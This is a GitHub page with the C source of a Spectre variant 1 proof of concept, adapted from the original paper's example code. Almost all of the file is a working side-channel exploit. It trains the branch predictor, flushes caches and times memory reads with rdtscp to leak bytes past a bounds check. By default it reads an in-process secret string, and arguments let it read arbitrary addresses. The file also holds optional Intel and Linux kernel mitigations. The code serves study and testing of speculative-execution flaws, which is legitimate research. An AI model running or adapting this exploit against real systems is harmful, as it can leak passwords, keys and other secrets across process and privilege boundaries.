-
Notifications
You must be signed in to change notification settings - Fork 89
/
spectre.c
390 lines (337 loc) · 10.9 KB
/
spectre.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
/*********************************************************************
*
* Spectre PoC
*
* This source code originates from the example code provided in the
* "Spectre Attacks: Exploiting Speculative Execution" paper found at
* https://spectreattack.com/spectre.pdf
*
* Minor modifications have been made to fix compilation errors and
* improve documentation where possible.
*
**********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtsc, rdtscp, clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtsc, rdtscp, clflush */
#endif /* ifdef _MSC_VER */
/* Automatically detect if SSE2 is not available when SSE is advertized */
#ifdef _MSC_VER
/* MSC */
#if _M_IX86_FP==1
#define NOSSE2
#endif
#else
/* Not MSC */
#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif
#endif /* ifdef _MSC_VER */
#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif
/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[16] = {
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16
};
uint8_t unused2[64];
uint8_t array2[256 * 512];
char * secret = "The Magic Words are Squeamish Ossifrage.";
uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
#ifdef LINUX_KERNEL_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 */
/**
* array_index_mask_nospec() - generate a mask that is ~0UL when the
* bounds check succeeds and 0 otherwise
* @index: array element index
* @size: number of elements in array
*
* Returns:
* 0 - (index < size)
*/
static inline unsigned long array_index_mask_nospec(unsigned long index,
unsigned long size)
{
unsigned long mask;
__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
:"=r" (mask)
:"g"(size),"r" (index)
:"cc");
return mask;
}
#endif
void victim_function(size_t x) {
if (x < array1_size) {
#ifdef INTEL_MITIGATION
/*
* According to Intel et al, the best way to mitigate this is to
* add a serializing instruction after the boundary check to force
* the retirement of previous instructions before proceeding to
* the read.
* See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
*/
_mm_lfence();
#endif
#ifdef LINUX_KERNEL_MITIGATION
x &= array_index_mask_nospec(x, array1_size);
#endif
temp &= array2[array1[x] * 512];
}
}
/********************************************************************
Analysis code
********************************************************************/
#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
/* Flush memory using long SSE instructions */
void flush_memory_sse(uint8_t * addr)
{
float * p = (float *)addr;
float c = 0.f;
__m128 i = _mm_setr_ps(c, c, c, c);
int k, l;
/* Non-sequential memory addressing by looping through k by l */
for (k = 0; k < 4; k++)
for (l = 0; l < 4; l++)
_mm_stream_ps(&p[(l * 4 + k) * 4], i);
}
#endif
/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(int cache_hit_threshold, size_t malicious_x, uint8_t value[2], int score[2]) {
static int results[256];
int tries, i, j, k, mix_i;
unsigned int junk = 0;
size_t training_x, x;
register uint64_t time1, time2;
volatile uint8_t * addr;
#ifdef NOCLFLUSH
int junk2 = 0;
int l;
(void)junk2;
#endif
for (i = 0; i < 256; i++)
results[i] = 0;
for (tries = 999; tries > 0; tries--) {
#ifndef NOCLFLUSH
/* Flush array2[512*(0..255)] from cache */
for (i = 0; i < 256; i++)
_mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */
#else
/* Flush array2[256*(0..255)] from cache
using long SSE instruction several times */
for (j = 0; j < 16; j++)
for (i = 0; i < 256; i++)
flush_memory_sse( & array2[i * 512]);
#endif
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size;
for (j = 29; j >= 0; j--) {
#ifndef NOCLFLUSH
_mm_clflush( & array1_size);
#else
/* Alternative to using clflush to flush the CPU cache */
/* Read addresses at 4096-byte intervals out of a large array.
Do this around 2000 times, or more depending on CPU cache size. */
for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) {
junk2 = cache_flush_array[l];
}
#endif
/* Delay (can also mfence) */
for (volatile int z = 0; z < 100; z++) {}
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=0xFFFFFFFFFFFF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));
/* Call the victim! */
victim_function(x);
}
/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255;
addr = & array2[mix_i * 512];
/*
We need to accuratly measure the memory access to the current index of the
array so we can determine which index was cached by the malicious mispredicted code.
The best way to do this is to use the rdtscp instruction, which measures current
processor ticks, and is also serialized.
*/
#ifndef NORDTSCP
time1 = __rdtscp( & junk); /* READ TIMER */
junk = * addr; /* MEMORY ACCESS TO TIME */
time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
#else
/*
The rdtscp instruction was instroduced with the x86-64 extensions.
Many older 32-bit processors won't support this, so we need to use
the equivalent but non-serialized tdtsc instruction instead.
*/
#ifndef NOMFENCE
/*
Since the rdstc instruction isn't serialized, newer processors will try to
reorder it, ruining its value as a timing mechanism.
To get around this, we use the mfence instruction to introduce a memory
barrier and force serialization. mfence is used because it is portable across
Intel and AMD.
*/
_mm_mfence();
time1 = __rdtsc(); /* READ TIMER */
_mm_mfence();
junk = * addr; /* MEMORY ACCESS TO TIME */
_mm_mfence();
time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
_mm_mfence();
#else
/*
The mfence instruction was introduced with the SSE2 instruction set, so
we have to ifdef it out on pre-SSE2 processors.
Luckily, these older processors don't seem to reorder the rdtsc instruction,
so not having mfence on older processors is less of an issue.
*/
time1 = __rdtsc(); /* READ TIMER */
junk = * addr; /* MEMORY ACCESS TO TIME */
time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
#endif
#endif
if ((int)time2 <= cache_hit_threshold && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */
}
/* Locate highest & second-highest results results tallies in j/k */
j = k = -1;
for (i = 0; i < 256; i++) {
if (j < 0 || results[i] >= results[j]) {
k = j;
j = i;
} else if (k < 0 || results[i] >= results[k]) {
k = i;
}
}
if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
}
value[0] = (uint8_t) j;
score[0] = results[j];
value[1] = (uint8_t) k;
score[1] = results[k];
results[0] ^= junk; /* use junk so code above won’t get optimized out*/
}
/*
* Command line arguments:
* 1: Cache hit threshold (int)
* 2: Malicious address start (size_t)
* 3: Malicious address count (int)
*/
int main(int argc,
const char * * argv) {
/* Default to a cache hit threshold of 80 */
int cache_hit_threshold = 80;
/* Default for malicious_x is the secret string address */
size_t malicious_x = (size_t)(secret - (char * ) array1);
/* Default addresses to read is 40 (which is the length of the secret string) */
int len = 40;
int score[2];
uint8_t value[2];
int i;
#ifdef NOCLFLUSH
for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
cache_flush_array[i] = 1;
}
#endif
for (i = 0; i < (int)sizeof(array2); i++) {
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
}
/* Parse the cache_hit_threshold from the first command line argument.
(OPTIONAL) */
if (argc >= 2) {
sscanf(argv[1], "%d", &cache_hit_threshold);
}
/* Parse the malicious x address and length from the second and third
command line argument. (OPTIONAL) */
if (argc >= 4) {
sscanf(argv[2], "%p", (void * * )( &malicious_x));
/* Convert input value into a pointer */
malicious_x -= (size_t) array1;
sscanf(argv[3], "%d", &len);
}
/* Print git commit hash */
#ifdef GIT_COMMIT_HASH
printf("Version: commit " GIT_COMMIT_HASH "\n");
#endif
/* Print cache hit threshold */
printf("Using a cache hit threshold of %d.\n", cache_hit_threshold);
/* Print build configuration */
printf("Build: ");
#ifndef NORDTSCP
printf("RDTSCP_SUPPORTED ");
#else
printf("RDTSCP_NOT_SUPPORTED ");
#endif
#ifndef NOMFENCE
printf("MFENCE_SUPPORTED ");
#else
printf("MFENCE_NOT_SUPPORTED ");
#endif
#ifndef NOCLFLUSH
printf("CLFLUSH_SUPPORTED ");
#else
printf("CLFLUSH_NOT_SUPPORTED ");
#endif
#ifdef INTEL_MITIGATION
printf("INTEL_MITIGATION_ENABLED ");
#else
printf("INTEL_MITIGATION_DISABLED ");
#endif
#ifdef LINUX_KERNEL_MITIGATION
printf("LINUX_KERNEL_MITIGATION_ENABLED ");
#else
printf("LINUX_KERNEL_MITIGATION_DISABLED ");
#endif
printf("\n");
printf("Reading %d bytes:\n", len);
/* Start the read loop to read each address */
while (--len >= 0) {
printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
/* Call readMemoryByte with the required cache hit threshold and
malicious x address. value and score are arrays that are
populated with the results.
*/
readMemoryByte(cache_hit_threshold, malicious_x++, value, score);
/* Display the results */
printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
printf("0x%02X=’%c’ score=%d ", value[0],
(value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
if (score[1] > 0) {
printf("(second best: 0x%02X=’%c’ score=%d)", value[1],
(value[1] > 31 && value[1] < 127 ? value[1] : '?'), score[1]);
}
printf("\n");
}
return (0);
}